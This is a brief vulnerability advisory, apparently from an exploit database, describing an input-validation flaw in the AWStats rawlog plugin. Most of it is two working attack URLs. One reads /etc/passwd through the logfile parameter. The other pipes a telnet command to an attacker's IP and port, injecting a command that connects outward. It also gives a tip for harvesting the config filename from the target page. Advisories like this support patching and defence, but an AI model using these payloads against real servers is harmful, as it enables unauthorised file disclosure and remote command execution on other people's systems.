AWStats Rawlog Plugin Logfile Parameter Input Validation Vulnerability

AWStats Rawlog Plugin Logfile Parameter Input Validation Vulnerability

There is no exploit required, the following example is available:

http://www.example.com/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=www.example.com&framename=main&pluginmode=rawlog&logfile=/etc/passwd
http://www.example.com/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=www.example.com&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet <your ip> <port>

Where the '&config' parameter value is the configuration file for www.example.com. It is reported that the configuration filename can be harvested from the HTML source of the awstats page for the target site.